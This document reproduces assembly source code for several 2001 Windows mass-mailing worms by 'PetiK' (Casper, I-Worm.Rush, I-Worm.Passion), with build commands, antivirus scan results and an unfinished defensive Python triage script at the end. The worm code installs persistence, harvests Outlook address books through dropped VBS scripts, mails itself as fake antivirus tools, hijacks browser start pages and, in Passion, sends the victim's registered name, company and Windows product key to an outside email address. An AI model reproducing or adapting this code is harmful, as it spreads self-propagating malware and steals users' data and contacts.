F3: push esi callx UnmapViewOfFile F2: push ebp callx CloseHandle F1: push ebx callx CloseHandle End_Spread_worm: popad ret Scan_Mail: pushad xor edx,edx mov edi,offset m_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"#" je f_mail cmp al,"@" je not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je Scan_Mail call Send_Mail jmp Scan_Mail entr2: xor al,al stosb pop edi jmp Scan_Mail f_mail: FIN: push 00h callx ExitProcess Send_Mail: xor eax,eax push eax push eax push eax push offset Message push [MAPIHdl] callx MAPISendMail ret .data ; ===== Main_Worm ===== wsock_file db 50 dup (0)

; ===== Check_Wsock ===== wsckhdl dd 0 wsckmap dd 0 wsckview dd 0 PEHeader dd 0 warning db "Warning : You're infected by",00h verif dd ? ; ===== Copy_Worm ===== original db 50 dup (0) copy_name db 50 dup (0) ; ===== Prepare_Spread_Worm ===== octets dd ? ; ===== Spread_Worm ===== m_addr db 128 dup (?) casper_mail db 50 dup (0) mail_name db "Casper_Tool.exe",00h MAPIHdl dd 0 Tmp dd 0 subject body db db db db db db db db db dd dd dd dd dd dd dd dd dd dd dd MsgFrom dd dd dd dd dd MsgTo dd dd dd dd dd dd dd dd dd dd dd ? ? ? ? ? ? 1 offset m_addr offset m_addr ? ? dd ? ? ? offset original offset mail_name ? "Casper Tool Protect 1.00",00h "Hi,",0dh,0ah "Look at this attachment...",0dh,0ah "This freeware alert you if you infected by " "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah "The tool Casper v.1.00 scans this specific file and displays a message " "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah 09h,09h,09h,"Good Bye and have a nice day",00h dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach dd ?

Message

Attach

vbsd: db 'On Error Resume Next',0dh,0ah db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah db 'c.Close',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah

db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah db 'c.WriteLine P.Address',0dh,0ah db 'c.Close',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah db 'c.WriteLine "#"',0dh,0ah db 'c.Close',0dh,0ah VBSSIZE = $-vbsd MAX_PATH FILETIME dwLowDateTime dwHighDateTime FILETIME equ 260 struct dd ? dd ? ends

WIN32_FIND_DATA struct dwFileAttributes dd ? ftCreationTime FILETIME ? ftLastAccessTime FILETIME ? ftLastWriteTime FILETIME ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved0 dd ? dwReserved1 dd ? cFileName dd MAX_PATH (?) cAlternateFileName db 13 dup (?) db 3 dup (?) WIN32_FIND_DATA ends Search end DEBUT end WIN32_FIND_DATA <>

File Casper.exe received on 05.16.2009 11:21:10 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.Win32.Petik!IK Win32/Petik.worm.6144 Worm/Casper Worm/Win32.Win32 W32/Malware!791a Win32:Trojan-gen {Other} I-Worm/Petik.G Win32.Petik.E@mm Worm.Win32.Petik.J Win32.Petik.8192 Suspicious File Win32/Petik.6144!intended W32/Malware!791a Email-Worm.Win32.Petik W32/PetTick@mm Win32.Petik.E@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Casper Worm:Win32/Petik.K@mm Win32/Petik.J W32/Pet_Tick.6144.A W32/Casper I-Worm.Petik.K1 High Risk Cloaked Malware W32/Petik-I Email-Worm.Win32.Petik W95.Pet_Tick.gen WORM_PET.TICK.R Win32.Worm.Petik.8192 I-Worm.Petik.K1

Additional information
File size: 6144 bytes
MD5...: 87e2b361908ac17e03ae947c75a140a2
SHA1..: f038e389ea778594125222e97d82a0a2c1404986
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment #
Name   : I-Worm.Rush
Author : PetiK
Date   : August 27th - September 2nd
Size   : 5632 byte (compiled with UPX tool)
Action :
 * Copy itself to WINDOWS\SYSTEM\Mail32.exe
 * Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value Mail Outlook = WINDOWS\SYSTEM\Mail32.exe

 * On Wednesday it opens the cdrom
 * The 3rd it produces a sound
 * The 15th it alters "Search Page", "Start Page", and "Local Page" by
 * Creates %personal%\Read_Me.txt with a text
 * A vbs file searches all email in the Outlook software and puts them in the Mailbook.txt. The worm scans the file to find email.
   Subject : New Scan Virus...
   Body : Hi man, I send you the last update of ScanVir (v 2.5). Look at the file attached. Bye and have a nice day.
   Attached : ScanVir_25.exe
 * Scans title of windows :
   - Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
   - System Properties => Minimize the window

To build the worm:
 @echo off
 tasm32 /ml /m9 Rush
 tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
 upx -9 Rush.exe
 if exist *.obj del *.obj
 if exist *.map del *.map

To delete the worm:
 del %windir%\system\Mail32.exe
 del %personal%\Read_Me.txt
 del %windir%\MailBook.txt
#

.586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: ;call hide_worm twin_worm: push mov push push callx mov push push push callx add 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax

mov stosd mov stosd mov stosd pop push push push callx

eax,"iaM\" eax,".23l" eax,"exe" edi 0 edi esi CopyFileA

push 8 push edi push 1 @pushsz "Mail Outlook" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h callx SHSetValueA check_date: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDayOfWeek],03h jne beep1 cdrom_open: push 00h push 00h push 00h @pushsz "open cdaudio" callx mciSendStringA push 00h push 00h push 00h @pushsz "set cdaudio door open" callx mciSendStringA beep1: callx cmp jne mov beep2: push callx push callx cmp jne push offset SystemTime GetSystemTime [SystemTime.wDay],03h special_folder counter,0 inc counter 30h MessageBeep 1 Sleep counter,5000 beep2

special_folder: push 00h push 05h push offset personal push 00h callx SHGetSpecialFolderPathA @pushsz "\Read_Me.txt" push offset personal callx lstrcat txt_file: push push push push push push push callx mov push push push push push callx push 00h 01h 02h 00h 01h 40000000h offset personal CreateFileA [FileHdl],eax 00h offset octets TXTSIZE offset txtd [FileHdl] WriteFile [FileHdl]

callx CloseHandle vbs_file: pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\rushhour.vbs" callx CreateFileA xchg edi,eax push 00h push offset octets push VBSSIZE push offset vbsd push edi callx WriteFile push edi callx CloseHandle popad push 1 @pushsz "wscript C:\rushhour.vbs" callx WinExec push 2000 callx Sleep @pushsz "C:\rushhour.vbs" callx DeleteFileA push callx cmp jne call start_scan: mov push push push callx add mov stosd mov stosd mov stosd mov stosd xor stosd offset SystemTime GetSystemTime [SystemTime.wDay],0Fh start_scan internet_page edi,offset mailbook edi 50 edi GetWindowsDirectoryA edi,eax eax,"iaM\" eax,"ooBl" eax,"xt.k" ax,"t" eax,eax

open_scan_file: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset mailbook callx CreateFileA inc eax je not_exist dec eax xchg eax,ebx xor push push push push push push callx eax,eax eax eax eax 2 eax ebx CreateFileMappingA

test je xchg xor push push push push push callx test je xchg push push callx cmp jbe

eax,eax F1 eax,ebp eax,eax eax eax eax 4 ebp MapViewOfFile eax,eax F2 eax,esi 0 ebx GetFileSize eax,3 F3

scan_file: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"#" je f_mail cmp al,"@" jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je scan_file call send_mail jmp scan_file entr2: xor al,al stosb pop edi jmp scan_file f_mail: F3: push esi callx UnmapViewOfFile F2: push ebp callx CloseHandle F1: push ebx callx CloseHandle not_exist: popad scan_window:mov counter,0 win1: inc counter cmp counter,1000000 je end_w @pushsz "Norton AntiVirus" push 00h callx FindWindowA test eax,eax jz win2 jmp change_nav win2: @pushsz "System Properties" push 00h callx FindWindowA test eax,eax jz win3

jmp show_window win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer" push 00h callx FindWindowA test eax,eax jz win1 jmp display_message change_nav: mov edi,eax @pushsz "Norton Virus : W32.Norton.Worm@mm" push edi callx SetWindowTextA jmp win1 show_window: mov edi,eax push 2 push edi callx ShowWindow jmp win1 display_message: mov edi,eax push 10h @pushsz "Microsoft Internet Explorer" @pushsz "You don't have access to this page" push 00h callx MessageBoxA push 0 push edi callx ShowWindow jmp win1 end_w: push 00h callx ExitProcess hide_worm: pushad @pushsz "Kernel32.dll" callx GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx callx GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret internet_page: pushad call diff_val db "Search Page",0 db "Start Page",0 db "Local Page",0 diff_val: pop esi push 3 pop ecx page_loop: push ecx push 32 @pushsz "http://www.petik.fr.fm" push 1 push esi @pushsz "Software\Microsoft\Internet Explorer\Main" push 80000001h callx SHSetValueA @endsz pop ecx loop page_loop popad ret send_mail:

xor push push push push push callx ret

eax,eax eax eax offset Message eax [MAPIHdl] MAPISendMail

.data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) ; === beep === counter dd ?

; === special_folder === personal db 70 dup (0) octets dd ? FileHdl dd ? ; === scan email === mailbook db 50 dup (0) mail_addr db 128 dup (?) MAPIHdl dd 0 name_mail db "ScanVir_25.exe",0

subject body

namefrom Message

db db db db db dd dd dd dd dd dd dd dd dd dd dd

db "New Scan Virus...",0 "Hi man,",0dh,0ah "I send you the last update of ScanVir (v 2.5).",0dh,0ah "Look at the file attached.",0dh,0ah,0dh,0ah 09h,09h,09h,09h,"Bye and have a nice day.",0 "Your Best Friend",0 dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach dd ? namefrom ? ? ? ? 1 offset mail_addr offset mail_addr ? ? dd ? ? ? offset orig_worm offset name_mail ?

MsgFrom dd dd dd dd MsgTo dd dd dd dd dd dd dd dd dd dd dd

Attach

txtd: db "Hi man,",0dh,0ah,0dh,0ah db "I don't want to destroy your computer.",0dh,0ah

db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah db 09h,09h,09h,"PetiK",00h TXTSIZE equ $-txtd vbsd: db 'On Error Resume Next',0dh,0ah db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah db 'txt.Close',0dh,0ah db 'For Each M In chan.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O=1 To M.AddressEntries.Count',0dh,0ah db 'Set P=M.AddressEntries(O)',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah db 'txt.WriteLine P.Address',0dh,0ah db 'txt.Close',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah db 'txt.WriteLine "#"',0dh,0ah db 'txt.Close',0dh,0ah VBSSIZE equ $-vbsd signature origine author end start end db "I-Worm.Rush",00h db "A worm made in France",00h db "Written by PetiK - 2001",00h

File Rush.exe received on 05.16.2009 19:29:11 (CET)
Antivirus : a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version : 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update : 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result : Email-Worm.Win32.Petik!IK Win32/Petik.worm Worm/Petik.H1 Worm/Win32.Win32 W32/Malware!92e7 Win32:Petik-Rush I-Worm/Petik.L Generic.Malware.SMsp!g.42345E6D I-Worm.Petik Worm.Petik Worm.Win32.Petik.Q Win32.Petik.8192 Suspicious File Win32/Himan W32/Malware!92e7 Email-Worm.Win32.Petik W32/PetTick@mm Generic.Malware.SMsp!g.42345E6D Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!7B523F10E098 Worm.Petik.H1 Worm:Win32/Petick.H@mm Win32/Petik.Q W32/Pet_Tick.5632.B Worm/W32.Petik.5632.B W32/Petik I-Worm.Rush.A High Risk Cloaked Malware Worm.Mail.Petik.m W32/Petik-H Worm.Petik W95.Pet_Tick.gen WORM_PET.TICK.Q Win32.Worm.Petik.8192 I-Worm.Win32.Petik I-Worm.Rush.A

Additional information
File size: 5632 bytes
MD5...: 7b523f10e09815dd401a4db17a9813c5
SHA1..: b7f647c90aeb06ee2ce145c152d09bf67966559f
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

comment #
Name : I-Worm.Passion
Author : PetiK
Date : September 3rd - September 8th
Size : 5120 byte (compiled with UPX tool)
Action :
* Copy itself to WINDOWS\SYSTEM\MsVbdll32.exe
* Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value MsVbdll = WINDOWS\SYSTEM\MsVbdll32.exe

Depending on the system counter, it redirects the URL to : http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm
If the key HKCU\Software\[Check Passion] doesn't exist, it sends a mail to passion@multimania.com with some information about the victim.
It creates %windir%\AllMail.txt with all mails that it finds in the Outlook Address Book and sends a new mail :
Subject : Take a look at this...
Body : It's very important. Mail me if you have some problems.
Attachment : Important.exe
It sends a mail to passionworm@multimania.com (passionpetik) too with some information.

To build the worm:
@echo off
tasm32 /ml /m9 Passion
tlink32 -Tpe -c -x -aa Passion,,,import32,dllz
upx -9 Passion.exe
if exist *.obj del *.obj
if exist *.map del *.map

To delete the worm:
del %windir%\system\MsVbdll32.exe
del %windir%\AllMail.txt
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start: twin_worm: push mov push push callx mov push push push callx add mov stosd mov stosd mov stosd mov stosd pop call hide_worm 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax eax,"VsM\" eax,"lldb" eax,"e.23" eax,"ex" edi <= copy of the worm <= mails are saved here

push push push callx

0 edi esi CopyFileA

reg_save: push 8 push edi push 1 @pushsz "MsVbdll" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h callx SHSetValueA check_connect: push 0 push offset connected callx InternetGetConnectedState dec eax jnz exec_other system_counter: callx GetTickCount xor edx,edx mov ecx,10 div ecx cmp edx,2 jne check_connect call change_page chec_reg: push offset regDisp push offset regResu push 0 push 0F003Fh push 0 push 0 push 0 @pushsz "Software\[Check Passion]" push 80000001h callx RegCreateKeyExA push [regResu] callx RegCloseKey cmp [regDisp],1 jne vbs_file search_info: push 50 push offset passion_txt callx GetWindowsDirectoryA @pushsz "\Passion.txt" push offset passion_txt callx lstrcat call CreateDate call CreateTime push offset passion_txt push offset date @pushsz "Date" @pushsz "Date et Heure" callx WritePrivateProfileStringA push offset passion_txt push offset time @pushsz "Heure" @pushsz "Date et Heure" callx WritePrivateProfileStringA mov esi,offset name_user call name_size dd 30 name_size: push esi call reg dd 1 reg: @pushsz "RegisteredOwner" @pushsz "Software\Microsoft\Windows\CurrentVersion"

push 80000002h callx SHGetValueA push offset passion_txt push offset name_user @pushsz "Nom d'enregistrement" @pushsz "Information systême" callx WritePrivateProfileStringA mov esi,offset name_company call company_size dd 30 company_size: push esi call reg2 dd 1 reg2: @pushsz "RegisteredOrganization" @pushsz "Software\Microsoft\Windows\CurrentVersion" push 80000002h callx SHGetValueA push offset passion_txt push offset name_company @pushsz "Nom de l'entreprise" @pushsz "Information systême" callx WritePrivateProfileStringA mov esi,offset number_key call key_size dd 30 key_size: push esi call reg3 dd 1 reg3: @pushsz "ProductKey" @pushsz "Software\Microsoft\Windows\CurrentVersion" push 80000002h callx SHGetValueA push offset passion_txt push offset number_key @pushsz "Numéro de la clé Windows" @pushsz "Information systême" callx WritePrivateProfileStringA push 50 push offset Systemini callx GetWindowsDirectoryA @pushsz "\Win.ini" push offset Systemini callx lstrcat push offset Systemini push 20 push offset org_pays push offset default @pushsz "sCountry" @pushsz "intl" callx GetPrivateProfileStringA push offset passion_txt push offset org_pays @pushsz "Pays" @pushsz "Information systême" callx WritePrivateProfileStringA xor push push push push push callx eax,eax eax eax offset Message2 eax [hMapi] MAPISendMail

vbs_file: pushad push 00h push 80h push 02h push 00h push 01h

push 40000000h @pushsz "C:\passion.vbs" callx CreateFileA xchg edi,eax push 0 push offset octets push vbssize push offset vbsd push edi callx WriteFile push edi callx CloseHandle popad push 1 @pushsz "wscript C:\passion.vbs" callx WinExec push 1000 callx Sleep @pushsz "C:\passion.vbs" callx DeleteFileA start_scan: mov push push push callx add mov stosd mov stosd mov stosd xor stosd edi,offset allmail edi 50 edi GetWindowsDirectoryA edi,eax eax,"llA\" eax,"liaM" eax,"txt." eax,eax

open_scan_mail: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset allmail callx CreateFileA inc eax je end_spread dec eax xchg eax,ebx xor push push push push push push callx test je xchg xor push push push push push callx test je xchg push push eax,eax eax eax eax 2 eax ebx CreateFileMappingA eax,eax end_s1 eax,ebp eax,eax eax eax eax 4 ebp MapViewOfFile eax,eax end_s2 eax,esi 0 ebx

callx GetFileSize cmp eax,3 jbe end_s3 scan_mail: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"#" je f_mail cmp al,'@' jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je scan_mail call send_mail jmp scan_mail entr2: xor al,al stosb pop edi jmp scan_mail f_mail: end_s3: callx end_s2: callx end_s1: callx end_spread: popad jmp exec_other: push callx push push callx end_w: callx push esi UnmapViewOfFile push ebp CloseHandle push ebx CloseHandle end_w 10000 Sleep 0 offset copy_worm WinExec push 00h ExitProcess

hide_worm: pushad @pushsz "Kernel32.dll" callx GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx callx GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret change_page: pushad call @value

db "Default_Page_URL",0 db "Search Page",0 db "Start Page",0 db "Local Page",0 @value: pop esi push 4 pop ecx p_loop: push ecx push 32 @pushsz "http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm" push 1 push esi @pushsz "Software\Microsoft\Internet Explorer\Main" push 80000001h callx SHSetValueA @endsz pop ecx loop p_loop popad ret CreateDate Proc pushad mov edi,offset date push 32 push edi @pushsz "ddd, dd MMM yyyy" push 0 push 0 push 9 callx GetDateFormatA popad ret CreateDate EndP CreateTime Proc pushad mov edi,offset time push 32 push edi @pushsz "HH:mm:ss" push 0 push 0 push 9 callx GetTimeFormatA popad ret CreateTime EndP send_mail: xor push push push push push callx ret eax,eax eax eax offset Message eax [hMapi] MAPISendMail

.data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) date time db 17 dup (?) db 9 dup (?) === dd 0 dd 0 dd 0 db 0 db 50 dup (0) db 20 dup(0) db 50 dup (0) dd 0 dd 0

; === search_info name_user name_company number_key default Systemini org_pays passion_txt regDisp regResu

; === spread === connected dd 0 octets dd ? allmail db 50 dup (0) mail_addr db 128 dup (?) hMapi dd 0 subject body name_mail subject2 body2 mail_me Message dd dd dd dd dd dd dd dd dd dd dd Message2 dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd MsgTo dd dd dd dd dd dd db db db db db "Take a look at this...",0 "It's very important. Mail me if you have some problems.",0 "Important.exe",0 "Worm.Passion",0 "Another person",0 db "passionworm@multimania.com",0 dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach ? offset offset ? ? ? 2 offset 1 offset 1 offset dd ? ? ? ? ? ? 1 offset mail_addr offset mail_addr ? ? dd ? 1 ? offset mail_me ? ? dd ? ? ? offset orig_worm offset name_mail ? dd ? ? ? offset passion_txt ? ? subject2 body2

MsgFrom MsgTo2 Attach2

MsgFrom

MsgTo2 dd dd dd dd dd Attach dd dd dd dd dd Attach2 dd dd dd dd dd

vbsd: db 'On Error Resume Next',0dh,0ah db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt")',0dh,0ah db 'txt.Close',0dh,0ah db 'For Each M In chan.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O=1 To M.AddressEntries.Count',0dh,0ah db 'Set P=M.AddressEntries(O)',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah db 'txt.WriteLine P.Address',0dh,0ah db 'txt.Close',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\AllMail.txt",8,true)',0dh,0ah db 'txt.WriteLine "#"',0dh,0ah db 'txt.Close',0dh,0ah vbssize equ $-vbsd signature author end start end db "I-Worm.Passion",00h db "Coded by PetiK - 2001",00h

File Passion.exe received on 05.16.2009 19:28:44 (CET)
Antivirus : a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster
Version : 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0
Last Update : 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16
Result : Email-Worm.Win32.Petik!IK Win32/Petik.worm.5120 Worm/Petik.AV.07 Worm/Win32.Win32 W32/Malware!cacd Win95:Passion I-Worm/Petik Generic.Malware.SMksp!g.37F2CD76 I-Worm.Petik Worm.Win32.Petik.V Win32.Petik.8192 Suspicious File W32/Malware!cacd Email-Worm.Win32.Petik W32/Petik!worm Generic.Malware.SMksp!g.37F2CD76 Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!0A4E37025FEC Worm.Petik.AV.07 Worm:Win32/Petick.O@mm Win32/Petik.V W32/Petik.R W32/Petik.C I-Worm.Passion.A High Risk Cloaked Malware Worm.Mail.Win32.Petik W32/Petik-M Email-Worm.Win32.Petik W95.Pet_Tick.gen WORM_PET.TICK.O Win32.Worm.Petik.8192 I-Worm.Passion.A

Additional information
File size: 5120 bytes
MD5...: 0a4e37025fec58713036fa88a28a070e
SHA1..: d85aa3be13c031e015b7378c7cb1951fb7ba2efa
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
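A host-triage check for the artefacts the Rush and Passion sources above leave behind: the Run-key value MsVbdll pointing at MsVbdll32.exe, the Internet Explorer "Main" values rewritten to http://www.petik.fr.fm (Rush: Search Page, Start Page, Local Page) or to the scody.net page (Passion: those three plus Default_Page_URL), the HKCU\Software\[Check Passion] marker key, and the harvested-address files MailBook.txt and AllMail.txt together with the C:\passion.vbs dropper. This is an added example written for defenders, not code from PetiK's archive. The registry is modelled as a plain dict of key path to value map so that the check runs offline on an exported snapshot; the snapshot below is constructed for the demonstration, not captured from a real host, and the function names are mine.

```python
"""
Triage check for the Rush / Passion host artefacts described on this page.
Added defender-side example; not part of PetiK's sources.  Registry data is a
dict {key path: {value name: data}} so an exported snapshot can be fed in
offline.  SAMPLE_REG / SAMPLE_FILES are constructed, not captured.
"""
import ntpath

RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
IE_MAIN_KEY = r"HKCU\Software\Microsoft\Internet Explorer\Main"
MARKER_KEY = r"HKCU\Software\[Check Passion]"

# Run value name -> executable the Passion header says it registers.
RUN_VALUES = {"msvbdll": "msvbdll32.exe"}
# IE "Main" values the worms overwrite (Rush: three of them, Passion: all four).
IE_VALUES = {"default_page_url", "search page", "start page", "local page"}
HIJACK_URLS = {
    "http://www.petik.fr.fm",                                     # Rush
    "http://www.scody.net/ggdag/fra/testi/la_passion_orig.htm",  # Passion
}
# Files the VBS droppers create: harvested address lists and the dropper itself.
DROPPED_NAMES = {"mailbook.txt", "allmail.txt", "passion.vbs"}


def _lookup(reg, key):
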